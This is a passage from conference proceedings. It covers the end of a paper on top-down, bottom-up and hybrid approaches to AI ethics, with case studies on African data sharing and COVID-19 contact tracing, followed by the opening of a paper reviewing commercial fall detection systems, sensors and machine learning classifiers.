Association for Computing Machinery (ACM) which addressed a narrower but closely related set of issues. [32] Since then we have seen an explosion of lists of principles for AI ethics. A deeper discussion of principles can be found in Sect. 7.1 of this paper. The bottom-up side of the political perspective is not as prevalent but could look like crowd-collected considerations about ethics in AI, such as from em-ployees at a company, students on a campus, or online communities. The key feature of bottom-up ethics from a political perspective is determinism by ev-eryday people, mainly, the users of the technology. MIT’s moral machine (which collected data from millions of people on their decisions in a game-like program to assess what a self-driving vehicle should do in life or death situations), is one example of this [6]. However, it still has top-down implications such as obeying traffic laws imposed by municipalities. A pure bottom-up community-driven ethics initiative could include guidelines, checklists, and case studies specific to the ethical challenges of crowdsourced tasks [26]. Even when utilizing bottom-up “crowdsourcing” and employing the moral determination of the majority, these systems often fail to serve minority partici-pants. In a roundtable discussion from the Open Data Initiative (ODI), [1] they found that marginalized communities have a unique placement for understanding and identifying the contradictions and tensions of the systems we all operate in. Their unique perspectives could be leveraged to create change. If a system works for the majority, which is often the goal, it may be invisibly dysfunctional for people outside of the majority. This insight is invaluable to alleviate ingrained biases. There is an assumption that bottom-up data institutions will represent everyone in society and always be benign. Alternatively, there is a counter-argument that their narrow focus leads to niche datasets and lacks applicability to societal values. In the best light, bottom-up data institutions are viewed as revolutionary mechanisms that could rebalance power between big tech companies and communities [1]. An important point to keep in mind when thinking about bottom-up ethics is that there will always be different ideals coming from different groups of people, and the details of the applications are where the disagreements abound.
6 The Bottom-Up Method of AI Being Taught Ethics Through Reinforcement Learning To recombine the perspectives of theoretical, technical, and political bottom-up ethics for AI is a useful analytical thought experiment. Allen et al. [5] describe bottom-up approaches to ethics in AI as those which learn through experience and strive to create environments where appropriate behavior is selected or rewarded, instead of functioning under a specific moral theory. These approaches learn either by unconscious mechanistic trial and failure of evolution, by engineers or programmers adjusting to new challenges they encounter, or by the learning machine’s own educational development [5]. The authors explain the difficulties of evolving and developing strategies that hold the promise of a rise in skills and standards that are integral to the overall design of the system. Trial and error are the fundamental tenets of evolution and learning, which rely heavily on learning from unsuccessful strategies and mistakes. Even in the fast-paced world of computer processing and evolutionary algorithms, this is an extremely time consuming
Contextualizing Artificially Intelligent Morality
491
process. Additionally, we need safe spaces for these mistakes to be made and learned from, where ethics can be developed without real-world consequences. 6.1 Reinforcement Learning as a Methodology for Teaching AI Ethics Reinforcement learning (RL) is a technique of machine learning where an agent learns by trial and error in an interactive environment, utilizing feedback from its own actions and experiences [8]. Reinforcement learning is different from other forms of learning that rely on top-down rules. Rather, this system learns as it goes, making many mistakes but learning from them, and it adapts through sensing the environment. RL is commonly used in training algorithms to play games, such as Alpha Go and chess. When it originated, RL was studied in animals, as well as early computers. The trial and error beginnings of this technique have origins in the psychology of animal learning in the early 1900s (Pavlov), as well as in some of the earliest work in AI. This coalesced in the 1980s to develop into the modern field of reinforcement learning [27]. RL utilizes a goal-oriented approach, as opposed to having explicit rules of operation. A ‘rule’ in RL can come about as a temporary side-effect as it attempts to solve the problem, however if the rule proves ineffective later on, it can be discarded. The function of RL is to compensate for machine learning draw-backs by mimicking a living organism as much as possible [29]. This style of learning that throws the rule book out the window could be promising for something like ethics, where the rules are not overly consistent or even agreed upon. Ethics is more situation-dependent, therefore teaching a broad rule is not always sufficient. It is a worthwhile investigation to question if RL could be methodized in integrating ethics into AI. The problems addressed by RL consist of learning what to do and how to navigate situations into actions in order to maximize a numerical reward signal. The three most important distinguishing features of RL are: First, that it is essentially a closed-loop; second, that it is not given direct instructions on what actions to take; and third, that there are consequences (reward signals) playing out over extended periods of time [27]. Turning ethics into numerical rewards can pose many challenges, but may be a hopeful consideration for programming ethics into AI systems. Critically, the agent must be able to sense its environment to some degree and it must be able to take actions that affect the state [27]. One of the ways that RL can work in an ethical sense, and to avoid pitfalls, is by utilizing systems that keep a human in the loop. “Interactive learning constitutes a complementary approach that aims at overcoming these limitations by involving a human teacher in the learning process” [20]. Keeping a human in the loop is critical for many issues, including those around transparency. Moral uncertainty needs to be considered, purely because ethics is an area of vast uncertainty, and is not an answerable math problem with predictable results [12]. Could an RL program eventually learn how to compute all the different ethical possibilities? This may take a lot of experimentation. It is important to know the limitations, while also remaining open to being surprised. We worry a lot about the unknowns of AI: Will it truly align with our values? Only through experimentation can we find out. Researchers stress the importance of RL systems needing a ‘safe learning environment’ where they can learn without any harm being caused to humans, assets, or the external environment.
492
J. S. Roberts and L. N. Montoya
The gap between simulated and actual environments, however, complicates this issue, particularly related to differentiating societal and human values [10].
7 The Top-Down Method of AI Being Taught Ethics Summarizing top-down ethics for AI brings together the philosophical principles, programming rules, and authoritative control in this area. A common thread among all sets of top-down principles is ensuring AI is used for “social good” or “the benefit of humanity”. These phrases carry with them few if any real commitments, hence, a great majority of people can agree on them. However, many of these proposed principles for AI ethics are simply too broad to be action guiding [32]. Furthermore, if these principles are being administered from big Tech or the government in a top-down political manner, there could be a lot that slips under the radar because it sounds good. Relating to the earlier example in Sect. 2.1, ‘fairness’ is something we can all agree is good, but we can’t all agree what it means. Fair for one person or group could equate to really unfair to another. According to Wallach et al. [31] the price of top-down theories can amount to static definitions which fail to accommodate new conditions, or may potentially be hostile. The authors note that the meaning and application of principle goals can be subject to debate due to them being overly vague and abstract [31]. This is a problem that will need to be addressed going forward. A machine doesn’t implicitly know what ‘fairness’ means. So how can we teach it a singular definition when fairness holds a different context for everyone? Next, we turn to the area of principles of AI ethics to explore the top-down method further. 7.1 Practical Principles for AI Ethics Principles of AI are a top-down approach to ethics for artificial intelligence. In the last few years, we have been seeing lists of principles for AI ethics emerging prolifically. These lists are very useful, not only for AI and its impact, but also on a larger social level. Because of AI, people are thinking about ethics in a whole new way: How do we define and digest ethics in order to codify it? Principles can be broken into two categories: principles for people who program AI systems to follow, and principles for the AI itself. Some of the principles for people, mainly programmers and data scientists, read like commandments. For instance, The Institute for Ethical AI and ML [28] has a list of eight principles geared toward technologists that can be viewed in Table 3. Other lists of principles are geared towards the ethics of AI systems them-selves and what they should adhere to. One such list consists of four principles, published by the National Institute of Standards and Technology (NIST) [22] and are intended to promote explainability. These can be viewed in Table 4. Many of the principles overlap across corporations and agencies. A detailed graphic and writeup published by the Berkman Klein Center for Internet and Society at Harvard
Contextualizing Artificially Intelligent Morality
493
gives a detailed overview of forty seven principles that various organizations, corporations, and other entities are adopting, including where they overlap and their definitions. The authors provide many lists and descriptions of ethical principles for AI, and categorize them into eight thematic trends, listed on the following page: Table 3. Principles and their commitments for technologists to develop machine learning systems responsibly as described in the practical framework to develop AI responsibly by the institute for ethical AI & machine learning [28] Principle
Commitment of technologists
Human augmentation
To keep a human in the loop
Bias evaluation
To continually monitor bias
Explainability and justification
To improve transparency
Reproducibility
To ensure infrastructure that is reasonably reproducible
Displacement strategy
To mitigate impact on workers due to automation
Practical accuracy
To align with domain-specific applications
Trust by privacy
To protect and handle data
Data risk awareness
To consider data and model security
Table 4. Principles and their commitments for responsible machine learning and AI systems [22] Principle
Commitment of AI system
Explanation
provide evidence and reasons for its processes and outputs
Meaningful and understandable have methods to evaluate meaningfulness Explanation accuracy
correctly reflect the reason(s) its generated output
Knowledge limits
ensure that a system only operates under conditions for which it was designed and that it does not give overly confident answers in areas it has limited knowledge of. ex: a system programmed to classify birds being used to classify an apple
1. 2. 3. 4. 5. 6. 7. 8.
Privacy Accountability Safety and security Transparency and explainability Fairness and non-discrimination Human control of technology Professional responsibility Promotion of human values [16]
494
J. S. Roberts and L. N. Montoya
One particular principle that is missing from these lists regards taking care of the natural world and non-human life. As Boddington states in her book, Toward a Code of Ethics for Artificial Intelligence (2018), “… we are changing the world, AI will hasten these changes, and hence, we’d better have an idea of what changes count as good and what count as bad” [9]. We will all have different opinions on this, but it needs to be part of the discussion. We can’t continue to destroy the planet while trying to create super AI, and still be under the illusion that our ethics principles are saving the world. Many of these principles are theoretically sound, yet act as a veil that presents the illusion of ethics. This can be dangerous because it makes us feel like we are practicing ethics while business carries on as usual. Part of the reason for this is because the field of ethical AI development is so new and more research must be done yet to ensure the overall impact is a benefit to society. “Despite the proliferation of these ‘AI principles,’ there has been little scholarly focus on understanding these efforts either individually or as contextualized within an expanding universe of principles with discernible trends” [16]. Principles are a double sided coin. On one hand, making the stated effort to follow a set of ethical principles is good. It is beneficial for people to be thinking about doing what is right and ethical, and not just blindly entering code that could be detrimental in unforeseen ways. Some principles are simple in appearance yet incredibly challenging in practice. For example, if we look at the commonly adopted principle of transparency, there is quite a difference between saying that algorithms and machine learning should be explainable and actually developing ways to see inside of the black box. As datasets get bigger, this presents more and more technical challenges [9]. Furthermore, some of the principles can conflict with each other, which can land us in a less ethical place than where we started. For example, transparency can conflict with privacy, another popular principle. We can run into a lot of complex problems around this, which needs to be addressed quickly and thoroughly as we move into the future. Overall, we want these concepts in people’s minds: such as Fairness. Accountability, and Transparency. These are the core tenets and namesake of the FAccT conference [2] that addresses these principles in depth. It is incredibly important for corporations and programmers to be concerned about the commonly addressed themes of bias, discrimination, oppression, and systemic violence. Yet, what can happen is that these principles make us feel like we are doing the right thing, however, how much does writing out these ideals actually change things? In order for AI to be ethical, A LOT has to change, and not just in the tech world. There seems to be an omission of the unspoken principles: the value of money for corporations and those in power and convenience for those who can afford it. If we are aiming to create fairness, accountability, and transparency in AI, we need to do some serious work on society to adjust our core principles away from money and convenience and towards taking care of everyone’s basic needs and the Earth. Could AI be a tool that has a side effect of starting an ethics revolution? How do we accomplish this? The language that we use is important, especially when it comes to principles. Moss and Metcalf pointed out the importance of using market-friendly terms. If we want morality to win out, we need to justify the organizational resources necessary, when more times than not, companies will choose profit over social good [19].
Contextualizing Artificially Intelligent Morality
495
Whittlestone et al. describe the need to focus on areas of tension in ethics in AI, and point out the ambiguity of terms like ‘fairness’, ‘justice’, and ‘autonomy’. The authors prompt us to question how these terms might be interpreted differently across various groups and contexts [32]. They go on to say that principles need to be formalized into standards, codes and ultimately regulation in order to be useful in practice. Attention is drawn to the importance of acknowledging tensions between high-level goals of ethics, which can differ and even contradict each other. In order to be effective, it is vital to include a measure of guidance on how to resolve different scenarios. In order to reflect genuine agreement, there must be acknowledgement and accommodation of different perspectives and values as much as possible [32]. The authors then introduce four reasons that discussing tensions is beneficial and important for AI ethics: 1. 2. 3. 4.
Bridging the gap between principles and practice. Acknowledging differences in values. Highlighting areas where new solutions are needed. Identifying ambiguities and knowledge gaps [32].
Each of these needs to be considered ongoing, as these tensions don’t get solved overnight. Particularly, creating a bridge between principles and practice is important. “We need to balance the demand to make our moral reasoning as robust as possible, with safeguarding against making it too rigid and throwing the moral baby out with the bathwater by rejecting anything we can’t immediately explain. This point is highly relevant both to drawing up codes of ethics, and to the attempts to implement ethical reasoning in machines” [9]. Codes of ethics and ethical principles for AI are important and help start important conversations. However, it can’t stop there. The future will see more and more ways that these principles are put into action, and bring technologists and theorists together to investigate ways to make them function efficiently and ethically. We must open minds to ideas beyond making money for corporations and creating conveniences, and rather toward addressing tensions and truly creating a world that works for everyone.
8 The Hybrid of Bottom-Up and Top-Down Ethics for AI We have reviewed the benefits and flaws of a top-down approach to ethics in AI, and visited the upsides and pitfalls of the bottom-up approach as well. Many argue that the solution lies somewhere in between, in a hybrid model. “If no single approach meets the criteria for designating an artificial entity as a moral agent, then some hybrid will be necessary. Hybrid approaches pose the additional problems of meshing both diverse philosophies and dissimilar architectures.” [5]. Many agree that a hybrid of top-down and bottom-up would be the most effective model for ethical AI. Further, some argue that we need to question the ethics of people, both as the producers and consumers of technology, before we can start to assess fairness in AI. Researchers state that hybrid AI combines the most desirable aspects of bottom-up, such as neural networks, and top-down, also referred to as symbiotic AI [25]. When huge
496
J. S. Roberts and L. N. Montoya
data sets are combined, neural networks are allowed to extract patterns. Then, information can be manipulated and retrieved by rule-based systems utilizing algorithms to manipulate symbols [25]. Further research has observed the complementary strengths and weaknesses of bottom-up and top-down strategies. Raza et al. developed a hybrid program synthesis approach, improving top-down interference by utilizing bottom-up analysis [24]. When we apply this to ethics and values, ethical concerns that arise from out-side of the entity are emphasized by top-down approaches, while the cultivation of implicit values arising from within the entity are addressed by bottom-up approaches [31]. While the authors stated that hybrid systems lacking effective or advanced cognitive faculties will be functional across many domains, they noted how essential it is to recognize times when additional capabilities will be required [31]. Theoretically, hybrid ethic for AI which features the best of top-down and bottomup methods in combination is incredibly promising, but in reality, many of the semifunctional or non-functional applications of supposed ethical AI prove challenging and have unforeseen side effects. Many real-world examples could be seen as a hybrid of ethics in AI, and not all have beaming qualities of top-down and bottom-up ethics; rather, they represent the messiness and variance of life. Next we will explore a selection of case studies, which will reflect some ethical AI concerns in real-world examples from across the globe. 8.1 Data Mining Case Study: The African Indigenous Context Data sharing, or data mining, is a prime example of conflicting principles of AI ethics. On one hand, it is the epitome of transparency and a crucial element to scientific and economic growth. On the other hand, it brings up serious concerns about privacy, intellectual property rights, organizational and structural challenges, cultural and social contexts, unjust historical pasts, and potential harms to marginalized communities [4]. We can reflect on this as a hybrid of top-down and bottom-up ethics in AI, since it utilizes top-down politics, bottom-up data collection, and is theoretically a conflict between the principles of the researchers and the researched communities. The term data colonialism can be used to describe some of the challenges of data sharing, or data mining, which reflect the historical and present-day colonial practices such as in African and Indigenous contexts. When we use terms such as ‘mining’ to discuss how data is collected from people, the question remains, who benefits from the data collection? The use of data can paradoxically be harmful to communities it is collected from. Trust is challenging due to the historical actions taken by data collectors while mining data from Indigenous populations. What barriers exist that prevent collected data from being of benefit to African people? We must address the entrenched legacies of power disparities concerning what challenges they present for modern data sharing [4]. One problematic example is of a non-government organization (NGO) that tried to ‘fix’ problems for marginalized ethnic groups and ended up causing more harm than good. In this case, a European-based NGO planned to address the problem of access to clean potable water in Buranda, while simultaneously testing new water accessibility technology and online monitoring of resources [4]. The NGO failed to understand the perspective of the community on the true central issues and potential harms. Sharing the data publicly, including geo-graphic locations, put the community at risk, as collective
Contextualizing Artificially Intelligent Morality
497
privacy was violated. In the West privacy is often thought of as a personal concern, however collective identity serves as a great importance to a multitude of African and Indigenous communities. This introduced trust issues due to the disempowerment of local communities in the decision-making process. Another case study in Zambia observed that up to 90% of health research funding comes from external funders, meaning the bargaining power gives little room for negotiations for Zambian scholars. In the study, power imbalances were reported in everything from funding to agenda setting, data collection, analysis, interpretation, and reporting of results [4]. This example exhibits further the understanding that trust cannot be formed on the foundation of these imbalances of power. Due to this lack of trust, many researchers have run into hurdles with collecting data from marginalized communities. Many of these research projects lead with good intentions, yet there was a lack of forethought into the ethical use of data, during and after the project, which can create unforeseen and irreparable harms to the wellbeing of communities. This creates a hostile environment to build relationships of respect and trust [4]. To conclude this case study in data mining, we can pose the ethical question, “is data sharing good/beneficial?” First and foremost, local communities must be the primary beneficiaries of responsible data sharing practices [4]. It is important to specify who benefits from data sharing, and to make sure that it is not doing any harm to the people behind the data. 8.2 Contact Tracing for COVID-19 Case Study Another complex example of ethics in AI can be seen in the use of contact tracing during the COVID-19 pandemic. Contact tracing can be centralized or non-centralized, which directly relates to top-down and bottom-up methods. The centralized approach is what was deplored in South Korea, where by law, and for the purposes of infectious disease control, the national authority is permitted to collect and use information on all COVID-19 patients and their contacts [15]. In 2020, Germany and Israel tried and failed at adopting centralized approaches, due to a lack of exceptions for public health emergencies in their privacy laws. [15] Getting past the legal barriers can be a lengthy and complex process and not conducive to applying a centralized contract tracing system for the outbreak [15]. Non-centralized approaches to contact tracing are essentially smartphone apps which track proximal coincidence with less invasive data collection methods. These approaches have thus been adopted by many countries, and don’t have the same cultural and political obstacles as centralized approaches, avoiding legal pitfalls and legislative reform. [15]. Justin Fendos, a professor of cell biology at Dongseo University in Busan, South Korea, wrote that in supporting the public health response to COVID-19, Korea had the political willingness to use technological tools to their full potential [14]. The Korean government had collected massive amounts of transaction data to investigate tax fraud even before the COVID-19 outbreak. Korea’s government databases hold records of literally every credit card and bank transaction, and this information was repurposed during the outbreak to retroactively track individuals. In Korea, 95% of adults own a
498
J. S. Roberts and L. N. Montoya
smartphone and many use cashless tools everywhere they go, including on buses and subways [14]. Hence, contact tracing in Korea was extremely effective. Public opinion about surveillance in Korea has been stated to be overwhelmingly positive. Fatalities in Korea due to COVID-19 were a third of the global average as of April 2020, when it was also said that they were one of the few countries to have successfully flattened the curve. There have been concerns, despite the success, regarding the level of personal details released by health authorities, which have motivated updated surveillance guidelines for sensitive information [14]. Turning to the other side of the planet, a very different picture can be painted. One study focused on three heavily impacted cities in Brazil which had the most deaths from COVID-19 until the first half of 2021. The researchers provided a methodology for applying data mining as a public health management tool, including identifying variables of climate and air quality in relation to the number of COVID-19 cases and deaths. They used rules-based forecasting models and provided forecasting models of new COVID-19 cases and daily deaths in the three Brazilian cities studied. (S˜ao Paulo, Rio de Janeiro and Manaus) [7]. However, the researchers noted that counting of cases in Brazil was affected by high underreporting due to low testing, as well as technical and political problems, hence the study stated that cases may have been up to 12 times greater than investigations indicated [7]. This shows us that the same technology cannot necessarily be scaled to work for all people in all places across the globe, and that individual concern must be taken when looking for the best solutions for everyone.
9 Discussion In the primary paper that this research builds on titled Artificial Morality: Top-down, Bottom-up, and Hybrid Approaches, the authors lead by stating: “Artifi-cial morality shifts some of the burden for ethical behavior away from designers and users, and onto the computer systems themselves” [5]. This is a questionable claim. Machines cannot be held responsible for what they learn from people, ever. Machines do not have an inherent conscience or morality as humans do. Moreover, AI can act as a mirror, and the problems that arise in AI often reflect the problems we have in society. People need to assume responsibility, both as individuals and as a society at large. Corporations and governments need to cooperate, and individual programmers and technologists should continually question and evaluate these systems and their morality. In this way, we can use AI technology in an effort to improve society, and create a more sustainable world for everyone. The approach of moral uncertainty is intriguing because there isn’t ever one answer or solution to an ethical question, and to admit uncertainty leaves it open to continued questioning that can lead us to the answers that may be complex and decentralized. This path could possibly create a system that can adapt to meet the ethical considerations of everyone involved [31]. Ultimately, societal ethics need to be considered, as AI does not exist in a vacuum. A large consideration is technology in service of making money, primarily for big corporations, and not for improving lives and the world. As long as this is the backbone driving AI and other new technology, we cannot reach true ethics
Contextualizing Artificially Intelligent Morality
499
in this field. Given our tendency for individualism over collectivism, who gets to decide what codes of ethics AI follows? If it is influenced by Big Tech, which is often the case, it will serve to support the ethics of a company, which generally has the primary goal of making money for that company. The value of profit over all else needs to shift. “Big Tech has transformed ethics into a form of capital—a transactional object external to the organization, one of the many ‘things’ contemporary capitalists must tame and procure… By engaging in an economy of virtue, it was not the corporation that became more ethical, but rather ethics that became corporatised. That is, ethics was reduced to a form of capital—another industrial input to maintain a system of production, which tolerated change insofar as it aligned with existing structures of profit-making” [21]. This reflects the case study of data mining in African communities, whose researchers set out to do good, however were still working in old frameworks around mining resources for personal gain, regurgitating colonialism. Until we can break free from these harmful systems, building an ethical AI is either going to continue to get co-opted and recapitalized, or possibly, it will find a way to create brand new systems where it can truly be ethical, creating a world where other worlds are possible. To leave us with a final thought: “Ethical issues are never solved, they are navigated and negotiated as part of the work of ethics owners.” [19].
10 Conclusion We have explored ethics in AI implementation in three ways: theoretically, technically, and politically as described through top-down, bottom-up, and hybrid frameworks. Within this paper, we reviewed reinforcement learning as a bottom-up example, and principles of AI ethics as a top-down example. The concept of fairness as a key ethical value for AI was discussed throughout. Case studies were reviewed to exemplify just how complex and variant ethics in AI can be in different cultures and at different times. The conclusion is that ethics in AI needs a lot more research and work, and needs to be considered from multiple angles while being continuously monitored for unforeseen side effects and consequences. Furthermore, societal ethics need to be accounted for. Our hope is that at least for those who are intending to build and deploy ethical AI systems, they will consider all angles and blind spots, including who might be marginalized or harmed by the technology, especially when it aims to help. By continuing to work on the seemingly impossible task of creating ethical AI, this will radiate out to society and ethics will become more and more of a power in itself that can have wider implications for the betterment of all.
References 1. Experimentalism and the Fourth Industrial Revolution #OPEN Roundtable Sum-mary Note: Experimentalism - Le Guin Part 2. Google Docs 2. ACM FAccT Conference, 1 (2022) 3. AI Principles - Future of Life Institute, 1 (2022)
500
J. S. Roberts and L. N. Montoya
4. Abebe, R., et al.: Narratives and counternarratives on data sharing in Africa. In: Fact 2021 - Proceedings of the 2021 ACM Conference on Fairness, Accountability, and Transparency (2021) 5. Allen, C., Smit, I., Wallach, W.: Artificial morality: top-down, bottom-up, and hybrid approaches. Ethics Inf. Technol. 7(3), 149– 155, 9 (2005) 6. Awad, E., et al.: The moral machine experiment. Nature 563(7729), 59–64 (2018) 7. da Silveira Barcellos, D., Fernandes, G.M.K., de Souza, F.D.: Data based model for predicting COVID-19 morbidity and mortality in metropolis. Scient. Reports 11(1), 24491 (2021) 8. Bhatt, S.: Reinforcement learning 101, 3 (2018) 9. Boddington, P.: Towards a Code of Ethics for Artificial Intelligence. Springer International Publishing, Cham (2017) 10. Bragg, J., Habli, I.: What Is Acceptably Safe for Reinforcement Learning? pp. 418–430 (2018) 11. Eckart, P.: Top-down AI: The Simpler, Data-Efficient AI (2020) 12. Ecoffet , A., Lehman, J.: Reinforcement Learning Under Moral Uncertainty, 6 (2020) 13. Etzioni, A., Etzioni, O.: Incorporating ethics into artificial intelligence. J. Ethics 21(4), 403– 418 (2017). https://doi.org/10.1007/s10892-017-9252-2 14. Fendos, J.: How surveillance technology powered South Korea’s COVID-19 response. Brookings Tech Stream, 4 (2020) 15. Fendos, J.: PART I: COVID-19 contact tracing: why South Korea’s success is hard to replicate. Georgetown J. Int. Affairs, 10 (2020) 16. Fjeld, J., Achten, N., Hilligoss, H., Nagy, A., Srikumar, M.: Principled artificial intelligence: mapping consensus in ethical and rights-based approaches to principles for AI. SSRN Electronic J. (2020) 17. Martin, K.: Ethical implications and accountability of algorithms. J. Bus. Ethics 160(4), 835–850 (2018). https://doi.org/10.1007/s10551-018-3921-3 18. Merriam-Webster. Merriam-Webster (2022) 19. Moss, E., Metcalf, J.: The ethical dilemma at the heart of Big Tech Companies., 11 (2019) 20. Najar, A., Chetouani, M.: Reinforcement learning with human Advice: a survey. Frontiers in Robotics and AI 8, 6 (2021) 21. Phan, T., Goldenfein, J., Mann, M., Kuch, D.: Economies of virtue: the circulation of ‘Ethics’ in big tech. Sci. Culture, 1–15, 11 (2021) 22. Jonathon Phillips, P.: Four Principles of Explainable Artificial Intelligence. Technical report, National Institute of Standards and Technology, Gaithersburg, MD, 9 (2021) 23. Rainie, L., Anderson, J., Vogels, E.: Experts doubt ethical AI design will be broadly adopted as the norm within the next decade. Pew Research Center: Internet, Science & Tech, 6 (2021) 24. Raza, M., Gulwani, S.: Web data extraction using hybrid program synthesis: a combination of top-down and bottom-up Inference. In: Proceedings of the 2020 ACM SIGMOD International Conference on Management of Data, pp. 1967–1978. ACM, New York 6 (2020) 25. Sagar, R.: What is Hybrid AI? Analytics India Magazine, 7 (2021) 26. Shmueli, B., Fell, J., Ray, S., Ku, L.-W.: Beyond fair pay: ethical implications of NLP crowdsourcing. In: Proceedings of the 2021 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Stroudsburg, PA, USA, pp. 3758–3769. Association for Computational Linguistics (2021) 27. Sutton, R., Barto, A.: Reinforcement Learning, 2 edn. MIT Press (2018) 28. The Institute for Ethical Ai & Machine Learning. The 8 principles for responsible development of AI & Machine Learning systems, 12 (2021) 29. Vachnadze, G.: Reinforcement learning: Bottom-up programming for ethical machines, 2 (2021) 30. van Rysewyk, S.P., Pontier, M.: A Hybrid Bottom-Up and Top-Down Approach to Machine Medical Ethics: Theory and Data pp. 93–110 (2015)
Contextualizing Artificially Intelligent Morality
501
31. Wallach, W., Allen, C., Smit, I.: Machine morality: bottom-up and top-down approaches for modelling human moral faculties. AI Soc. 22(4), 565– 582 (2008) 32. Whittlestone, J., Nyrup, R., Alexandrova, A., Cave, S.: The role and limits of principles in AI ethics. In: Proceedings of the 2019 AAAI/ACM Conference on AI, Ethics, and Society, pp. 195–200. ACM, New York (2019)
An Analysis of Current Fall Detection Systems and the Role of Smart Devices and Machine Learning in Future Systems Edward R. Sykes(B) Sheridan College, Centre for Mobile Innovation, Oakville, Ontario, Canada [email protected] https://www.sheridancollege.ca/research/centres/mobile-innovation
Abstract. Fall detection and prevention is a critical area of research especially as senior populations grow around the globe. This paper explores current fall detection systems, and proposes the integration of smart technology into existing fall detection systems via smartphones or smartwatches to provide a broad spectrum of opportunities for data collection and analysis. We created and evaluated three ML classifiers for fall detection, namely, k-NN, SVM, and DNN using an open-source fall dataset. The DNN performed the best with an accuracy of 92.591%. Recommendations are also included that illustrate the limitations of current systems, and suggest how new systems could be designed to improve the accuracy of detecting and preventing falls. Keywords: Fall detection · Fall prevention · mobile health (mHealth) · Seniors · Machine learning · Deep learning
1
Introduction
Of Canada’s nearly forty million citizens, approximately ten million people are aged forty-five to sixty-four [16]. Roughly a quarter of our citizens must consider the dangers of a simple slip and fall [16]. Often, when a senior falls, they can find themselves in hospital for a fractured hip, or a dislocated shoulder, or even head trauma [6,16]. Between 2008 and 2009, 73,190 people were admitted to hospital because of a fall [10]. Figure 1 presents the Canadian population in millions, by gender and age group (2021) [16]. Consistent with other populations in other countries, the 65 and over group is amongst the fastest growing cohort [16]. Fall detection and prevention systems have been in place for several years, but they have limitations and need improvement to curtail this high number of falls [14,21]. A review of current systems is needed to explore the limitations and opportunities for enhancement of fall detection and fall prevention systems. The main contributions of this work are: 1. a critical review of current fall detection and prevention systems that are commercially available, c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 502–520, 2023. https://doi.org/10.1007/978-3-031-28073-3_36
An Analysis of Current Fall Detection Systems
503
Fig. 1. Canadian population in millions, By gender and age group (2021) [16]
2. a comparison of three commonly used Machine Learning algorithms for fall detection, 3. recommendations for new fall detection and prediction systems. This paper is structured as follows: Sect. 2 provides a literature review of current fall detection and prevention systems commercially available on the market, the sensors, and algorithms used in such systems. Section 3 presents the methodology by which we designed our experiment including the machine learning algorithms, Sect. 4 presents the results, Sect. 5 provides a discussion and Sect. 6 provides a conclusion.
2 2.1
Literature Review Current Fall Detection and Fall Prevention Systems
This section presents a review of the current fall detection and fall prevention systems commercially available on the market. Galaxy Medical Alert. Galaxy Medical Alert Systems offers a variety of fall detection and emergency response systems [3]. Each system can be customized based on the needs of the individual. These systems include a base with a battery
504
E. R. Sykes
backup in case of power failure, 24/7 monitoring by a CSAA 5 Diamond Response Centre, two-way communication, and ONE button activation [3]. However, each system has different features based on extra needs that may arise from the individual’s circumstances. The basic Home System which has a limited number of features, the Home and Yard System, which includes all the features of the Home System, but also includes a battery backup in the pendant, and has a wider range of detection, for seniors who may frequently to be outside in the nearby vicinity [3]. Figure 2 presents the Galaxy Medical Alert system for fall detection. Galaxy Medical Alert also has a Fall Detection System, which automatically detects a fall, and sends for help, even if the person is unable to reach their button [3]. The Cellular System is the same as the Home System, but does not use a landline like the other systems— instead, it uses cellular 3G, 4G technology. Finally, there is a mobile-based version with their Fall Detection System. This system is intended for smartphone users that provides standard features, such as GPS location service, and Bluetooth pairing, and uses cellular communication technologies (LTE, 5G, etc.) [2].
Fig. 2. Galaxy medical alert system [2]
SecureMEDIC. SecurMEDIC is a system that uses either a pendant or a watch and a central base station [4]. These devices, apart from the station, are all 100% waterproof [4]. Figure 3 presents the SecureMEDIC system components. The system is compatible with mobile phones to answer incoming calls when help is requested. The device has an emergency button, and also has a microphone to talk into the device. Upon pressing the emergency button, the system calls the toll-free number to the call center. The system can also be used for emergencies that are
An Analysis of Current Fall Detection Systems
505
not fall related, for example burglaries or fires. The devices have a wireless range of 1,000 ft (approximately 300 m) from the central unit. The SecureMEDIC device has a low battery indicator light when it is time to replace and charge the battery for continuous monitoring [4]. The pendant device comes with or without a fall detection system and the watch only comes with the fall detection system [4].
Fig. 3. SecurMEDIC fall detection system with wrist sensor [4]
TELUS Health. TELUS Health has a few different fall detection systems, and the most popular one is the LivingWell Companion. Their basic version includes a pendant with an emergency button. This pendant includes a built-in microphone and speaker for communication, connects instantly to emergency services in the event the button is pressed, as well as connecting to family or friends. TELUS Health also offers a fall detection system, which includes all the features of the basic Companion, and additionally includes constant professional monitoring, fall detection, a built-in loudspeaker, and is waterproof. Figure 4 presents the TELUS Heath fall detection system and related components. TELUS Health also offers an On the Go Companion, which is meant for city travelling or monitoring around the neighborhood. To achieve this the device has a built-in GPS, constant monitoring, two-way communication, and auto-detection [17]. 2.2
Sensors
Sensors are an integral part of any fall detection or fall prevention system. Typically, sensors for these systems are applied to the body directly or within devices that are worn or carried close to the body [12,22,30]. Sensors provide extensive opportunity to collect data for fall detection algorithms. These sensors are also located in medical devices and our everyday devices (e.g., smartphones, smartwatches, etc.) [24,26,31]. Typical sensors used in these devices include gyroscopes, accelerometers, and magnetometers which are essential for fall detection and prevention system operation [27,31].
506
E. R. Sykes
Fig. 4. TELUS health - medical alert system - livingWell companion [17]
Wearable Sensors. Our review of fall detection system includes two types of sensors: data acquisition sensors and fall detection sensors. Data acquisition sensors are used when running controlled tests of everyday movements and controlled falls. This data is then manipulated and used to find the best mathematical formulas for the most optimal results of designing fall detection algorithms. The formulas are passed through a machine learning algorithm to classify the observation as a fall or not. Figure 5 presents a research grade sensor for fall detection research and a commercially available fall detection pendant.
(a) Data Collection Sensor [30]
(b) Fall Detection Pendant [3]
Fig. 5. Wearable sensor types
Smart Devices (Phones and Watches). Smartphones and smartwatches are outfitted with accelerometer and gyroscopes which are used to track a person’s movements in 3D environments [15]. The gyroscope measures movements across
An Analysis of Current Fall Detection Systems
507
3 axes and also includes the rotation along those axes known as pitch, roll, and yaw. The accelerometer detects the acceleration across these three axes (Fig. 6). Data received from these sensors are used by machine learning algorithms to determine if a fall has occurred. Currently, researchers are exploring ways to train ML or Deep Learning algorithms to identify potential falls before they occur. The state-of-the-art of such systems can predict only 100 ms before a fall occurs [27]. With so little advance notice, such systems hold little practical value, however, research groups around the world are exploring how to increase this advance warning through gait trend analysis coupled with other metrics such as cognitive decline and balance degradation [16].
